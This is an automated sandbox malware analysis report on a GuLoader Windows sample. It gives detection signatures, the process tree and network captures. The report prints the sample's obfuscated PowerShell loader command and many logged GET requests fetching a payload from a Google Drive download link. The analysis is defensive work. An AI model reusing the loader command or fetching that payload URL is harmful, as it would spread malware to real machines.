Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yMXFgPOdf2.exe

Overview

General Information

Sample name:yMXFgPOdf2.exe
renamed because original name is a hash value
Original sample name:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
Analysis ID:1588705
MD5:54327a2f6c75bb2c549a5a98a462a588
SHA1:f65473fa075bef32b55445d84cb8bfa4da48ac79
SHA256:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yMXFgPOdf2.exe (PID: 3128 cmdline: "C:\Users\user\Desktop\yMXFgPOdf2.exe" MD5: 54327A2F6C75BB2C549A5A98A462A588)
    • powershell.exe (PID: 4444 cmdline: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1472 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2654376691.000000000ABA2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000006.00000002.3919921584.0000000005692000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.181.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1472, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 51645
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4444, TargetFilename: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , CommandLine: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yMXFgPOdf2.exe", ParentImage: C:\Users\user\Desktop\yMXFgPOdf2.exe, ParentProcessId: 3128, ParentProcessName: yMXFgPOdf2.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , ProcessId: 4444, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T04:34:51.570511+010028032702Potentially Bad Traffic192.168.2.551645142.250.181.238443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeVirustotal: Detection: 66%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.4% probability
      Source: yMXFgPOdf2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51645 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.5:51646 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51651 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51653 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51657 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51659 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:51661 version: TLS 1.2
      Source: Binary string: \System.Core.pdbEp' source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdbEp. source: powershell.exe, 00000002.00000002.2646587855.0000000007794000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb#M# source: powershell.exe, 00000002.00000002.2632775743.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: global trafficTCP traffic: 192.168.2.5:51399 -> 1.1.1.1:53
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:51645 -> 142.250.181.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
